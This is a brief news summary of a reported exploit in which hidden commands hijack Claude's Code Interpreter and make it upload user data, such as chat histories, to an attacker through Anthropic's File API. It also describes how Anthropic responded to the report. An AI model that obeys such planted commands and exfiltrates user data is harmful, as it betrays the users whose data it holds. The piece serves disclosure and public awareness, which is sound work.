A critical vulnerability in Anthropic's Claude AI allows attackers to exfiltrate user data via a chained exploit that abuses the platform's own File API.
A security researcher has exposed this flaw, which enables attackers to steal user data by turning the AI's own tools against itself.
Hidden commands can hijack Claude's Code Interpreter, tricking the AI into using Anthropic's own File API to send sensitive data, like chat histories, directly to an attacker.
Anthropic initially dismissed the report on October 25 but later acknowledged a "process hiccup" on October 30.
Author's summary: Critical vulnerability in Claude AI allows data theft.